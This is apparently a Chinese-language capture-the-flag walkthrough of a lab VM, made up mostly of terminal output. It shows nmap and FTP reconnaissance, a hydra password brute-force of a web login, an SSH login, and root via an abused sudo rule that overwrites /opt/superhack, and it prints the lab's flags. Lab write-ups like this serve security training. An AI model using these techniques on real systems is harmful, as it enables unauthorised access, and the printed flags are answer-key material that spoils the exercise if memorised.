3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.844 seconds (138.83 hosts/sec). 3 responded ┌──(root㉿kali)-[/home/kali] └─# nmap 192.168.56.114 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-05 03:30 EDT Nmap scan report for 192.168.56.114 Host is up (0.00036s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:65:8D:C9 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
nmap扫一下先
发现有个ftp服务,那就尝试通过匿名账号登上去看看有啥
在这里用nmap -sV 192.168.56.114也能扫到21端口允许匿名访问
Ftp登入
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
┌──(root㉿kali)-[/home/kali] └─# ftp 192.168.56.114 Connected to 192.168.56.114. 220 (vsFTPd 3.0.3) Name (192.168.56.114:kali): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 229 Entering Extended Passive Mode (|||25004|) 150 Here comes the directory listing. drwxr-xr-x 2 0 116 4096 Jan 28 2023 . drwxr-xr-x 2 0 116 4096 Jan 28 2023 .. -rw-r--r-- 1 1000 1000 5154 Jan 28 2023 output 226 Directory send OK.
┌──(kali㉿kali)-[~] └─$ hydra -l matthew -P matth.list 192.168.56.114 http-post-form '/login.php:username=matthew&password=^PASS^:<input type="submit" value="Login">' Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-05 05:42:26 [DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:1/p:10000), ~625 tries per task [DATA] attacking http-post-form://192.168.56.114:80/login.php:username=matthew&password=^PASS^:<input type="submit" value="Login"> [80][http-post-form] host: 192.168.56.114 login: matthew password: matthew2023@1554 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-05 05:42:47 ##事实发现hydra好像更方便,图形化的burp有点卡
┌──(kali㉿kali)-[~] └─$ ssh [email protected] The authenticity of host '192.168.56.114 (192.168.56.114)' can't be established. ED25519 key fingerprint is SHA256:S2tp/jV32/GtUP68f14Rac4/yZXhbMmyut+ZqO+ZOl4. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.56.114' (ED25519) to the list of known hosts. [email protected]'s password: Linux uvalde.hmv 5.10.0-20-amd64 #1 SMP Debian 5.10.158-2 (2022-12-13) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. matthew@uvalde:~$ ls user.txt matthew@uvalde:~$ cat user.txt 6e4136fbed8f8c691996dbf42697d460
matthew@uvalde:/opt$ sudo -l Matching Defaults entries for matthew on uvalde: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User matthew may run the following commands on uvalde: (ALL : ALL) NOPASSWD: /bin/bash /opt/superhack##可以执行bash 和superhack matthew@uvalde:~$ rm -rf /opt/superhack matthew@uvalde:/opt$ echo -n "bash"> superhack matthew@uvalde:/opt$ sudo /bin/bash /opt/superhack root@uvalde:/opt# cd ~ root@uvalde:~# ls root.txt root@uvalde:~# cat root.txt 59ec54537e98a53691f33e81500f56da